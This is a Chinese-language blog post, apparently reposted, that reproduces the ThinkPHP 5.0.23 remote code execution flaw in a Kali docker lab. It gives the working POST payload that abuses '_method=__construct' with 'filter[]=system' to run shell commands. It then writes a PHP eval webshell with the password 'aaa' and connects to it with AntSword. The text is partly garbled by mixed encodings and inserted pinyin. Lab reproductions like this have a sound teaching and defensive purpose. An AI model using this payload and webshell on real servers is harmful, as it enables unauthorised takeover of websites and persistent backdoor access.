Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)
漏洞形成原因
- 框架介紹:
ThinkPHP是一款運(yùn)用極廣的PHP開發(fā)框架。 - 漏洞引入:
其5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。
漏洞如何利用
- 1、訪問靶機(jī)地址+端口號(hào) 進(jìn)入首頁
- 2、Burp抓包修改傳參方式為Post,傳入?yún)?shù)為"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd為系統(tǒng)執(zhí)行命令可進(jìn)行一系列操作。
漏洞復(fù)現(xiàn)過程
- Kali docker 容器中啟動(dòng)此漏洞環(huán)境
- 瀏覽器訪問 Kali 的 ip 地址接上8080端口
- Burp抓包修改傳參方式為Post,url后接入/index.php?s=captch,傳入?yún)?shù)為"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
/index.php?s=captcha #url后接
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd #POST傳入?yún)?shù)
-
Burp Go
-
嘗試寫入phpinfo
echo "<?php phpinfo(); ?>" > info.php
文章來源:http://www.zghlxwxcb.cn/news/detail-464494.html
- 成功!
- 寫入一句話
echo '<?php eval($_POST[aaa]); ?>' > shell.php #密碼:aaa
文章來源地址http://www.zghlxwxcb.cn/news/detail-464494.html
- 上蟻劍!
- 漏洞復(fù)現(xiàn)成功
參考文章:https://www.cnblogs.com/zenb/p/14537240.html
技術(shù)萌新,還請(qǐng)各位大牛多多指點(diǎn)!
到了這里,關(guān)于Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!